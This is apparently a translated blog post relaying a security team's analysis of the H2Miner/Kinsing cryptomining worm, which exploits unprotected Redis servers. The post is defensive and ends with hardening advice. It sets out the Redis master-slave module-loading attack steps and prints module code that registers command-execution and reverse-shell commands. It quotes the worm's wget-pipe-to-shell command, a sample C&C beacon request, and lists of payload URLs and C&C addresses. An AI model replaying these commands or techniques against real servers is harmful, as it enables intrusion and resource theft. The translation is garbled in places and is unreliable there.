A day ago, one of my project’s servers was attacked by a similar worm. In search of an answer to the question “what was that?” I found a great article by the Alibaba Cloud Security team. Since I didn’t find this article on Habré, I decided to translate it especially for you <3
Entry
Recently, the Alibaba Cloud security team discovered a sudden outbreak of H2Miner. This type of malicious worm uses the lack of authorization or weak passwords for Redis as gateways to your systems, after which it synchronizes its own malicious module with the slave through master-slave synchronization and finally downloads this malicious module to the attacked machine and executes malicious instructions.
In the past, attacks on your systems were primarily carried out using a method involving scheduled tasks or SSH keys that were written to your machine after the attacker logged into Redis. Fortunately, this method cannot be used often due to problems with permission control or due to different system versions. However, this method of loading a malicious module can directly execute the attacker's commands or gain access to the shell, which is dangerous for your system.
Due to the large number of Redis servers hosted on the Internet (nearly 1 million), Alibaba Cloud's security team, as a friendly reminder, recommends that users do not share Redis online and regularly check the strength of their passwords and whether they are compromised. quick selection.
H2Miner
H2Miner is a mining botnet for Linux-based systems that can invade your system in a variety of ways, including lack of authorization in Hadoop yarn, Docker, and Redis remote command execution (RCE) vulnerabilities. A botnet works by downloading malicious scripts and malware to mine your data, expand the attack horizontally, and maintain command and control (C&C) communications.
Redis RCE
Knowledge on this subject was shared by Pavel Toporkov at ZeroNights 2018. After version 4.0, Redis supports a plug-in loading feature that gives users the ability to load so files compiled with C into Redis to execute specific Redis commands. This function, although useful, contains a vulnerability in which, in master-slave mode, files can be synchronized with the slave via fullresync mode. This can be used by an attacker to transfer malicious so files. After the transfer is completed, the attackers load the module onto the attacked Redis instance and execute any command.
Malware Worm Analysis
Recently, the Alibaba Cloud security team discovered that the size of the H2Miner malicious miner group has suddenly increased dramatically. According to the analysis, the general process of attack occurrence is as follows:
H2Miner uses RCE Redis for a full-fledged attack. Attackers first attack unprotected Redis servers or servers with weak passwords.
They then use the command config set dbfilename red2.so to change the file name. After that, the attackers execute the command slaveof to set the master-slave replication host address.
When the attacked Redis instance establishes a master-slave connection with the malicious Redis that is owned by the attacker, the attacker sends the infected module using the fullresync command to synchronize the files. The red2.so file will then be downloaded to the attacked machine. Then the attackers use the ./red2.so loading module to load this so file. The module can execute commands from an attacker or initiate a reverse connection (backdoor) to gain access to the attacked machine.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
After executing a malicious command such as / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, the attacker will reset the backup file name and unload the system module to clean up the traces. However, the red2.so file will still remain on the attacked machine. Users are advised to pay attention to the presence of such a suspicious file in the folder of their Redis instance.
In addition to killing some malicious processes to steal resources, the attacker followed a malicious script by downloading and executing malicious binary files to . This means that the process name or directory name containing kinsing on the host may indicate that that machine has been infected by this virus.
According to the reverse engineering results, the malware mainly performs the following functions:
- Downloading files and executing them
- Mining
- Maintaining C&C communication and executing attacker's commands
Use masscan for external scans to expand your reach. In addition, the IP address of the C&C server is hard-coded in the program, and the attacked host will communicate with the C&C communication server using HTTP requests, where the zombie (compromised server) information is identified in the HTTP header.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Other attack methods
Addresses and links used by the worm
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Council
First, Redis should not be accessible from the Internet and should be protected with a strong password. It is also important that clients check that there is no red2.so file in the Redis directory and that there is no “kinsing” in the file/process name on the host.
Source: habr.com